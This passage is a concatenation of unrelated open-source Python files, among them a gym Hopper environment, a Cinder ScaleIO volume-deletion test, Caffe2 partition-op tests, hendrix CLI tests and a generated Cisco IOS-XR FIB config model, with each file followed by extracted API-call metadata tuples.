13016), 'math.cos', 'math.cos', (["(F * (source[i]['lat'] + source[end]['lat']))"], {}), "(F * (source[i]['lat'] + source[end]['lat']))\n", (12971, 13016), False, 'import math\n'), ((14749, 14779), 'coordTransform_utils.wgs84togcj02', 'wgs84togcj02', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\n', (14761, 14779), False, 'from coordTransform_utils import wgs84togcj02\n'), ((15155, 15184), 'coordTransform_utils.gcj02tobd09', 'gcj02tobd09', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\n', (15166, 15184), False, 'from coordTransform_utils import gcj02tobd09\n'), ((5546, 5569), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\n', (5554, 5569), False, 'import math\n'), ((5572, 5586), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (5580, 5586), False, 'import math\n'), ((5656, 5670), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (5664, 5670), False, 'import math\n'), ((5788, 5811), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\n', (5796, 5811), False, 'import math\n'), ((5813, 5827), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (5821, 5827), False, 'import math\n'), ((10136, 10150), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (10144, 10150), False, 'import math\n'), ((10153, 10167), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (10161, 10167), False, 'import math\n'), ((10215, 10229), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (10223, 10229), False, 'import math\n'), ((10232, 10246), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (10240, 10246), False, 'import math\n'), ((10311, 10325), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (10319, 10325), False, 'import math\n'), ((10328, 10342), 'math.sin', 'math.sin', (['lat2'], {}), '(lat2)\n', (10336, 10342), False, 'import math\n'), ((12112, 12126), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\n', (12121, 12126), False, 'import math\n'), ((12528, 12542), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\n', (12537, 12542), False, 'import math\n'), ((12867, 12881), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\n', (12876, 12881), False, 'import math\n'), ((5613, 5636), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\n', (5621, 5636), False, 'import math\n'), ((5639, 5653), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (5647, 5653), False, 'import math\n'), ((5713, 5727), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (5721, 5727), False, 'import math\n'), ((5730, 5744), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (5738, 5744), False, 'import math\n'), ((5830, 5853), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\n', (5838, 5853), False, 'import math\n'), ((5856, 5869), 'math.sin', 'math.sin', (['lat'], {}), '(lat)\n', (5864, 5869), False, 'import math\n'), ((12586, 12600), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\n', (12595, 12600), False, 'import math\n'), ((12925, 12939), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\n', (12934, 12939), False, 'import math\n')] |
import gym.envs.mujoco.hopper as hopper
import numpy as np
class HopperEnv(hopper.HopperEnv):
def _get_obs(self):
return np.concatenate([
self.sim.data.qpos.flat[1:],
self.sim.data.qvel.flat,
])
def reset_obs(self, obs):
state = np.insert(obs, 0, 0.)
qpos = state[:self.model.nq]
qvel = state[self.model.nq:]
self.set_state(qpos, qvel)
return self._get_obs()
| [
"numpy.insert",
"numpy.concatenate"
] | [((135, 205), 'numpy.concatenate', 'np.concatenate', (['[self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat]'], {}), '([self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat])\n', (149, 205), True, 'import numpy as np\n'), ((288, 310), 'numpy.insert', 'np.insert', (['obs', '(0)', '(0.0)'], {}), '(obs, 0, 0.0)\n', (297, 310), True, 'import numpy as np\n')] |
# Copyright (c) 2013 - 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from six.moves import urllib
from cinder import context
from cinder import exception
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_volume
from cinder.tests.unit.volume.drivers.emc import scaleio
from cinder.tests.unit.volume.drivers.emc.scaleio import mocks
class TestDeleteVolume(scaleio.TestScaleIODriver):
"""Test cases for ``ScaleIODriver.delete_volume()``"""
def setUp(self):
"""Setup a test case environment.
Creates a fake volume object and sets up the required API responses.
"""
super(TestDeleteVolume, self).setUp()
ctx = context.RequestContext('fake', 'fake', auth_token=True)
self.volume = fake_volume.fake_volume_obj(
ctx, **{'provider_id': fake.PROVIDER_ID})
self.volume_name_2x_enc = urllib.parse.quote(
urllib.parse.quote(self.driver._id_to_base64(self.volume.id))
)
self.HTTPS_MOCK_RESPONSES = {
self.RESPONSE_MODE.Valid: {
'types/Volume/instances/getByName::' +
self.volume_name_2x_enc: self.volume.id,
'instances/Volume::{}/action/removeMappedSdc'.format(
self.volume.provider_id): self.volume.provider_id,
'instances/Volume::{}/action/removeVolume'.format(
self.volume.provider_id
): self.volume.provider_id,
},
self.RESPONSE_MODE.BadStatus: {
'types/Volume/instances/getByName::' +
self.volume_name_2x_enc: mocks.MockHTTPSResponse(
{
'errorCode': 401,
'message': 'BadStatus Volume Test',
}, 401
),
'instances/Volume::{}/action/removeVolume'.format(
self.volume.provider_id
): mocks.MockHTTPSResponse(
{
'errorCode': 401,
'message': 'BadStatus Volume Test',
}, 401
),
},
}
def test_bad_login_and_volume(self):
self.set_https_response_mode(self.RESPONSE_MODE.BadStatus)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.volume)
def test_delete_volume(self):
"""Setting the unmap volume before delete flag for tests """
self.driver.configuration.set_override(
'sio_unmap_volume_before_deletion',
override=True)
self.driver.delete_volume(self.volume)
| [
"cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse",
"cinder.tests.unit.fake_volume.fake_volume_obj",
"cinder.context.RequestContext"
] | [((1268, 1323), 'cinder.context.RequestContext', 'context.RequestContext', (['"""fake"""', '"""fake"""'], {'auth_token': '(True)'}), "('fake', 'fake', auth_token=True)\n", (1290, 1323), False, 'from cinder import context\n'), ((1347, 1416), 'cinder.tests.unit.fake_volume.fake_volume_obj', 'fake_volume.fake_volume_obj', (['ctx'], {}), "(ctx, **{'provider_id': fake.PROVIDER_ID})\n", (1374, 1416), False, 'from cinder.tests.unit import fake_volume\n'), ((2211, 2299), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', (["{'errorCode': 401, 'message': 'BadStatus Volume Test'}", '(401)'], {}), "({'errorCode': 401, 'message':\n 'BadStatus Volume Test'}, 401)\n", (2234, 2299), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n'), ((2536, 2624), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', (["{'errorCode': 401, 'message': 'BadStatus Volume Test'}", '(401)'], {}), "({'errorCode': 401, 'message':\n 'BadStatus Volume Test'}, 401)\n", (2559, 2624), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n')] |
# -*- coding: utf-8 -*-
__version__ = '1.0.2'
import os
import appdirs
import osmnx as ox
import joblib
import requests
from .files import load_vars, save_vars, cached, inflate_tar, download_zipfile
from .data import data, list_data, problematic
from .tools.view_code import show_file
from . import mapping
cache_dir = None
memory = None
def set_cache_dir(location=None, compress=True, verbose=0, **kwargs):
"""
Set up a cache directory for use with the tutorials.
Parameter
---------
cache_dir : Path-like or False, optional
A path for the cache files. Set to False to disable caching.
"""
global memory, cache_dir
if location is None:
location = appdirs.user_cache_dir('transportation_tutorials')
if location is False:
location = None
memory = joblib.Memory(location, compress=compress, verbose=verbose, **kwargs)
make_cache = (
(ox, 'gdf_from_place'),
(ox, 'graph_from_bbox'),
(requests, 'get'),
(requests, 'post'),
)
for module, func_name in make_cache:
try:
func = getattr(module, f"_{func_name}_orig")
except AttributeError:
func = getattr(module, func_name)
setattr(module, f"_{func_name}_orig", func)
setattr(module, func_name, memory.cache(func))
set_cache_dir()
| [
"joblib.Memory",
"appdirs.user_cache_dir"
] | [((772, 841), 'joblib.Memory', 'joblib.Memory', (['location'], {'compress': 'compress', 'verbose': 'verbose'}), '(location, compress=compress, verbose=verbose, **kwargs)\n', (785, 841), False, 'import joblib\n'), ((668, 718), 'appdirs.user_cache_dir', 'appdirs.user_cache_dir', (['"""transportation_tutorials"""'], {}), "('transportation_tutorials')\n", (690, 718), False, 'import appdirs\n')] |
import os
import sys
from . import HendrixTestCase, TEST_SETTINGS
from hendrix.contrib import SettingsError
from hendrix.options import options as hx_options
from hendrix import ux
from mock import patch
class TestMain(HendrixTestCase):
def setUp(self):
super(TestMain, self).setUp()
self.DEFAULTS = hx_options()
os.environ['DJANGO_SETTINGS_MODULE'] = ''
self.devnull = open(os.devnull, 'w')
self.args_list = ['hx', 'start']
self.patcher = patch('hendrix.ux.findSettingsModule')
self.patcher.start()
def tearDown(self):
super(TestMain, self).tearDown()
self.devnull.close()
self.patcher.stop()
def test_settings_from_system_variable(self):
django_settings = 'django.inanity'
with patch('hendrix.ux.findSettingsModule') as findSettingsMod:
findSettingsMod.return_value = django_settings
options = self.DEFAULTS
self.assertEqual(options['settings'], '')
options = ux.djangoVsWsgi(options)
self.assertEqual(options['settings'], django_settings)
def test_settings_wsgi_absense(self):
with patch('hendrix.ux.findSettingsModule') as findSettingsMod:
findSettingsMod.return_value = ""
self.assertRaises(SettingsError, ux.djangoVsWsgi, self.DEFAULTS)
def test_user_settings_overrides_system_variable(self):
django_settings = 'django.inanity'
with patch('hendrix.ux.findSettingsModule') as findSettingsMod:
findSettingsMod.return_value = django_settings
options = self.DEFAULTS
user_settings = 'myproject.settings'
options['settings'] = user_settings
self.assertEqual(options['settings'], user_settings)
options = ux.djangoVsWsgi(options)
self.assertEqual(options['settings'], user_settings)
def test_wsgi_correct_wsgi_path_works(self):
wsgi_dot_path = 'hendrix.test.wsgi'
options = self.DEFAULTS
options.update({'wsgi': wsgi_dot_path})
options = ux.djangoVsWsgi(options)
self.assertEqual(options['wsgi'], wsgi_dot_path)
def test_wsgi_wrong_path_raises(self):
wsgi_dot_path = '_this.leads.nowhere.man'
options = self.DEFAULTS
options.update({'wsgi': wsgi_dot_path})
self.assertRaises(ImportError, ux.djangoVsWsgi, options)
def test_cwd_exposure(self):
cwd = os.getcwd()
_path = sys.path
sys.path = [p for p in _path if p != cwd]
self.assertTrue(cwd not in sys.path)
ux.exposeProject(self.DEFAULTS)
self.assertTrue(cwd in sys.path)
def test_pythonpath(self):
options = self.DEFAULTS
test_path = os.path.join(
os.path.dirname(os.getcwd()),
'hendrix/test/testproject'
)
options['pythonpath'] = test_path
ux.exposeProject(options)
self.assertTrue(test_path in sys.path)
sys.path = [p for p in sys.path if p != test_path]
def test_shitty_pythonpath(self):
options = self.DEFAULTS
test_path = '/if/u/have/this/path/you/suck'
options['pythonpath'] = test_path
self.assertRaises(IOError, ux.exposeProject, options)
def test_dev_friendly_options(self):
options = self.DEFAULTS
options['dev'] = True
self.assertFalse(options['reload'])
self.assertFalse(options['loud'])
options = ux.devFriendly(options)
self.assertTrue(options['reload'])
self.assertTrue(options['loud'])
def test_noise_control_daemonize(self):
options = self.DEFAULTS
options['quiet'] = True
options['daemonize'] = True
stdout = sys.stdout
stderr = sys.stderr
redirect = ux.noiseControl(options)
self.assertEqual(sys.stdout.name, stdout.name)
self.assertEqual(sys.stderr.name, stderr.name)
self.assertEqual(redirect, None)
def test_noise_control_traceback(self):
options = self.DEFAULTS
options['quiet'] = True
options['daemonize'] = True
options['traceback'] = True
stdout = sys.stdout
stderr = sys.stderr
redirect = ux.noiseControl(options)
self.assertEqual(sys.stdout.name, stdout.name)
self.assertEqual(sys.stderr.name, stderr.name)
self.assertEqual(redirect, None)
def test_main_with_daemonize(self):
sys.argv = self.args_list + ['-d', '--settings', TEST_SETTINGS]
class Process(object):
def poll(self):
return 0
with patch('time.sleep'):
with patch('subprocess.Popen') as popen:
popen.return_value = Process()
ux.main()
self.assertTrue(popen.called)
self.assertTrue('--settings' in popen.call_args[0][0])
sys.argv = []
def test_options_structure(self):
"""
A test to ensure that HendrixDeploy.options also has the complete set
of options available
"""
deploy = self.wsgiDeploy()
expected_keys = self.DEFAULTS.keys()
actual_keys = deploy.options.keys()
self.assertListEqual(expected_keys, actual_keys)
| [
"hendrix.options.options",
"mock.patch",
"hendrix.ux.noiseControl",
"hendrix.ux.djangoVsWsgi",
"os.getcwd",
"hendrix.ux.main",
"hendrix.ux.devFriendly",
"hendrix.ux.exposeProject"
] | [((323, 335), 'hendrix.options.options', 'hx_options', ([], {}), '()\n', (333, 335), True, 'from hendrix.options import options as hx_options\n'), ((495, 533), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (500, 533), False, 'from mock import patch\n'), ((2090, 2114), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (2105, 2114), False, 'from hendrix import ux\n'), ((2460, 2471), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2469, 2471), False, 'import os\n'), ((2600, 2631), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['self.DEFAULTS'], {}), '(self.DEFAULTS)\n', (2616, 2631), False, 'from hendrix import ux\n'), ((2912, 2937), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['options'], {}), '(options)\n', (2928, 2937), False, 'from hendrix import ux\n'), ((3479, 3502), 'hendrix.ux.devFriendly', 'ux.devFriendly', (['options'], {}), '(options)\n', (3493, 3502), False, 'from hendrix import ux\n'), ((3807, 3831), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\n', (3822, 3831), False, 'from hendrix import ux\n'), ((4240, 4264), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\n', (4255, 4264), False, 'from hendrix import ux\n'), ((793, 831), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (798, 831), False, 'from mock import patch\n'), ((1023, 1047), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (1038, 1047), False, 'from hendrix import ux\n'), ((1171, 1209), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (1176, 1209), False, 'from mock import patch\n'), ((1470, 1508), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (1475, 1508), False, 'from mock import patch\n'), ((1808, 1832), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (1823, 1832), False, 'from hendrix import ux\n'), ((4628, 4647), 'mock.patch', 'patch', (['"""time.sleep"""'], {}), "('time.sleep')\n", (4633, 4647), False, 'from mock import patch\n'), ((2799, 2810), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2808, 2810), False, 'import os\n'), ((4666, 4691), 'mock.patch', 'patch', (['"""subprocess.Popen"""'], {}), "('subprocess.Popen')\n", (4671, 4691), False, 'from mock import patch\n'), ((4765, 4774), 'hendrix.ux.main', 'ux.main', ([], {}), '()\n', (4772, 4774), False, 'from hendrix import ux\n')] |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from caffe2.python import core, workspace
from caffe2.python.test_util import TestCase, rand_array
class TestPartitionOps(TestCase):
def test_configs(self):
# (main dims, partitions, main type, [list of (extra dims, type)])
configs = [
((10, ), 3),
((4, ), 10),
((10, 10), 4),
((100, ), 2),
((5, ), 1),
((1, ), 1),
((2, 10), 2),
]
suffixes = [
[],
[((2, 2), np.float32)],
[((3, ), np.int64), ((2, ), np.float32)],
]
return [
(main_dims, parts, main_type, extra, pack)
for main_dims, parts in configs
for main_type in [np.int32, np.int64] for extra in suffixes
for pack in [False, True]
]
def testPartition(self):
for main_dims, parts, main_type, extra_ins, pack in self.test_configs():
ins = ['in' + str(i) for i in range(1 + len(extra_ins))]
outs = [
'in{}_p{}'.format(j, i)
for i in range(parts) for j in range(1 + len(extra_ins))
]
op = core.CreateOperator(
'Partition', ins, outs, pack_first_input=(1 if pack else 0))
x = []
for i, (dims, t) in enumerate([((), main_type)] + extra_ins):
if t in [np.float32, np.float64]:
d = rand_array(*(main_dims + dims))
else:
d = np.random.randint(-100, 100, (main_dims + dims))
d = d.astype(t)
workspace.FeedBlob(ins[i], d)
x.append(d)
def sharding(x):
# numpy has proper modulo op that yields non-negative results
shards = (x[0] % parts).reshape([-1])
out = []
for i in range(parts):
for ind, v in enumerate(x):
suffix_shape = v.shape[len(x[0].shape):]
accum = []
data = v.reshape((-1, ) + suffix_shape)
if pack and ind == 0:
data = data // parts
for j, s in enumerate(shards):
if s == i:
accum.append(data[j])
def join(a):
if not a:
return np.empty(shape=(0, ) + suffix_shape)
return np.stack(a)
out.append(join(accum))
return out
workspace.RunOperatorOnce(op)
ref = sharding(x)
print(x)
print(ref)
for name, expected in zip(outs, ref):
np.testing.assert_array_equal(
expected, workspace.FetchBlob(name)
)
# test inverse operation (GatherByKey)
if len(main_dims) == 1:
# currently only 1D key tensor supported
for i in range(len(extra_ins)):
expected_out = ins[i + 1]
gather_ins = [ins[0]] + [
outs[len(ins) * p + i + 1] for p in range(parts)]
actual_out = expected_out + '_actual'
op = core.CreateOperator(
'GatherByKey', gather_ins, actual_out)
workspace.RunOperatorOnce(op)
expected = workspace.FetchBlob(expected_out)
actual = workspace.FetchBlob(actual_out)
np.testing.assert_array_equal(expected, actual)
def testLengthsPartition(self):
for main_dims, parts, main_type, extra_ins, pack in self.test_configs():
# For LengthsSharding only 1-D tensors supported as a first input
if len(main_dims) > 1:
continue
ins = ['in' + str(i) for i in range(2 + len(extra_ins))]
outs = [
'in{}_p{}'.format(j, i)
for i in range(parts) for j in range(2 + len(extra_ins))
]
op = core.CreateOperator(
'LengthsPartition', ins, outs,
pack_first_input=(1 if pack else 0)
)
x = []
for i, (dims, t) in enumerate([((), main_type)] + extra_ins):
if t in [np.float32, np.float64]:
d = rand_array(*(main_dims + dims))
else:
d = np.random.randint(-100, 100, (main_dims + dims))
d = d.astype(t)
workspace.FeedBlob(ins[i + 1], d)
x.append(d)
# Randomly generate length tensor as well
elements = np.random.randint(2, 10)
lengths = []
total_length = 0
for _ in range(elements - 1):
lengths.append(np.random.randint(main_dims[0] - total_length))
total_length += lengths[-1]
lengths.append(main_dims[0] - total_length)
workspace.FeedBlob(ins[0], np.array(lengths, dtype=np.int32))
def sharding(x):
# numpy has proper modulo op that yields non-negative results
shards = (x[0] % parts).reshape([-1])
out = []
for i in range(parts):
idx = 0
sharded_lengths = np.zeros(elements)
for ind, length in enumerate(lengths):
for _ in range(length):
if shards[idx] == i:
sharded_lengths[ind] += 1
idx += 1
out.append(sharded_lengths)
for ind, v in enumerate(x):
suffix_shape = v.shape[len(x[0].shape):]
accum = []
data = v.reshape((-1, ) + suffix_shape)
if pack and ind == 0:
data = data // parts
for j, s in enumerate(shards):
if s == i:
accum.append(data[j])
def join(a):
if not a:
return np.empty(shape=(0, ) + suffix_shape)
return np.stack(a)
out.append(join(accum))
return out
workspace.RunOperatorOnce(op)
ref = sharding(x)
for name, expected in zip(outs, ref):
np.testing.assert_array_equal(
expected, workspace.FetchBlob(name)
)
if __name__ == "__main__":
import unittest
unittest.main()
| [
"caffe2.python.test_util.rand_array",
"caffe2.python.workspace.RunOperatorOnce",
"caffe2.python.workspace.FetchBlob",
"numpy.array",
"numpy.random.randint",
"numpy.zeros",
"numpy.stack",
"numpy.empty",
"caffe2.python.core.CreateOperator",
"unittest.main",
"numpy.testing.assert_array_equal",
"caffe2.python.workspace.FeedBlob"
] | [((7638, 7653), 'unittest.main', 'unittest.main', ([], {}), '()\n', (7651, 7653), False, 'import unittest\n'), ((2004, 2082), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""Partition"""', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), "('Partition', ins, outs, pack_first_input=1 if pack else 0)\n", (2023, 2082), False, 'from caffe2.python import core, workspace\n'), ((3473, 3502), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (3498, 3502), False, 'from caffe2.python import core, workspace\n'), ((5009, 5098), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""LengthsPartition"""', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), "('LengthsPartition', ins, outs, pack_first_input=1 if\n pack else 0)\n", (5028, 5098), False, 'from caffe2.python import core, workspace\n'), ((5625, 5649), 'numpy.random.randint', 'np.random.randint', (['(2)', '(10)'], {}), '(2, 10)\n', (5642, 5649), True, 'import numpy as np\n'), ((7355, 7384), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (7380, 7384), False, 'from caffe2.python import core, workspace\n'), ((2444, 2473), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i]', 'd'], {}), '(ins[i], d)\n', (2462, 2473), False, 'from caffe2.python import core, workspace\n'), ((5485, 5518), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i + 1]', 'd'], {}), '(ins[i + 1], d)\n', (5503, 5518), False, 'from caffe2.python import core, workspace\n'), ((5964, 5997), 'numpy.array', 'np.array', (['lengths'], {'dtype': 'np.int32'}), '(lengths, dtype=np.int32)\n', (5972, 5997), True, 'import numpy as np\n'), ((2269, 2300), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\n', (2279, 2300), False, 'from caffe2.python.test_util import TestCase, rand_array\n'), ((2347, 2393), 'numpy.random.randint', 'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\n', (2364, 2393), True, 'import numpy as np\n'), ((3704, 3729), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\n', (3723, 3729), False, 'from caffe2.python import core, workspace\n'), ((4190, 4248), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""GatherByKey"""', 'gather_ins', 'actual_out'], {}), "('GatherByKey', gather_ins, actual_out)\n", (4209, 4248), False, 'from caffe2.python import core, workspace\n'), ((4294, 4323), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (4319, 4323), False, 'from caffe2.python import core, workspace\n'), ((4355, 4388), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['expected_out'], {}), '(expected_out)\n', (4374, 4388), False, 'from caffe2.python import core, workspace\n'), ((4418, 4449), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['actual_out'], {}), '(actual_out)\n', (4437, 4449), False, 'from caffe2.python import core, workspace\n'), ((4470, 4517), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['expected', 'actual'], {}), '(expected, actual)\n', (4499, 4517), True, 'import numpy as np\n'), ((5310, 5341), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\n', (5320, 5341), False, 'from caffe2.python.test_util import TestCase, rand_array\n'), ((5388, 5434), 'numpy.random.randint', 'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\n', (5405, 5434), True, 'import numpy as np\n'), ((5777, 5823), 'numpy.random.randint', 'np.random.randint', (['(main_dims[0] - total_length)'], {}), '(main_dims[0] - total_length)\n', (5794, 5823), True, 'import numpy as np\n'), ((6291, 6309), 'numpy.zeros', 'np.zeros', (['elements'], {}), '(elements)\n', (6299, 6309), True, 'import numpy as np\n'), ((7542, 7567), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\n', (7561, 7567), False, 'from caffe2.python import core, workspace\n'), ((3372, 3383), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\n', (3380, 3383), True, 'import numpy as np\n'), ((7254, 7265), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\n', (7262, 7265), True, 'import numpy as np\n'), ((3300, 3335), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\n', (3308, 3335), True, 'import numpy as np\n'), ((7182, 7217), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\n', (7190, 7217), True, 'import numpy as np\n')] |
""" Cisco_IOS_XR_fib_common_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR fib\-common package configuration.
This module contains definitions
for the following management objects\:
fib\: CEF configuration
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class FibPbtsFallback(Enum):
"""
FibPbtsFallback (Enum Class)
Fib pbts fallback
.. data:: list = 1
Fallback to class number list
.. data:: any = 2
Fallback to any class
.. data:: drop = 3
Fallback to drop
"""
list = Enum.YLeaf(1, "list")
any = Enum.YLeaf(2, "any")
drop = Enum.YLeaf(3, "drop")
class FibPbtsForwardClass(Enum):
"""
FibPbtsForwardClass (Enum Class)
Fib pbts forward class
.. data:: any = 8
Any class
"""
any = Enum.YLeaf(8, "any")
class Fib(Entity):
"""
CEF configuration
.. attribute:: pbts_forward_class_fallbacks
PBTS class configuration
**type**\: :py:class:`PbtsForwardClassFallbacks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.PbtsForwardClassFallbacks>`
.. attribute:: platform
FIB platform parameters
**type**\: :py:class:`Platform <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.Platform>`
.. attribute:: auto_hash_recover
Set option for automatcially recovering consistent\-hashing state on interface up
**type**\: bool
.. attribute:: prefer_aib_routes
Set options for adjacency routes overriding RIB routes
**type**\: bool
.. attribute:: encap_sharing_disable
Set true to disable encapsulation sharing
**type**\: bool
.. attribute:: frr_follow_bgp_pic
Set option for fast\-reroute to follow BGP PIC update, not to wait for timeout
**type**\: bool
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib, self).__init__()
self._top_entity = None
self.yang_name = "fib"
self.yang_parent_name = "Cisco-IOS-XR-fib-common-cfg"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("pbts-forward-class-fallbacks", ("pbts_forward_class_fallbacks", Fib.PbtsForwardClassFallbacks)), ("platform", ("platform", Fib.Platform))])
self._leafs = OrderedDict([
('auto_hash_recover', (YLeaf(YType.boolean, 'auto-hash-recover'), ['bool'])),
('prefer_aib_routes', (YLeaf(YType.boolean, 'prefer-aib-routes'), ['bool'])),
('encap_sharing_disable', (YLeaf(YType.boolean, 'encap-sharing-disable'), ['bool'])),
('frr_follow_bgp_pic', (YLeaf(YType.boolean, 'frr-follow-bgp-pic'), ['bool'])),
])
self.auto_hash_recover = None
self.prefer_aib_routes = None
self.encap_sharing_disable = None
self.frr_follow_bgp_pic = None
self.pbts_forward_class_fallbacks = Fib.PbtsForwardClassFallbacks()
self.pbts_forward_class_fallbacks.parent = self
self._children_name_map["pbts_forward_class_fallbacks"] = "pbts-forward-class-fallbacks"
self.platform = Fib.Platform()
self.platform.parent = self
self._children_name_map["platform"] = "platform"
self._segment_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Fib, ['auto_hash_recover', 'prefer_aib_routes', 'encap_sharing_disable', 'frr_follow_bgp_pic'], name, value)
class PbtsForwardClassFallbacks(Entity):
"""
PBTS class configuration
.. attribute:: pbts_forward_class_fallback
Set PBTS class for fallback
**type**\: list of :py:class:`PbtsForwardClassFallback <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback>`
"""
_prefix = 'fib-common-cfg'
_revision = '2017-05-01'
def __init__(self):
super(Fib.PbtsForwardClassFallbacks, self).__init__()
self.yang_name = "pbts-forward-class-fallbacks"
self.yang_parent_name = "fib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
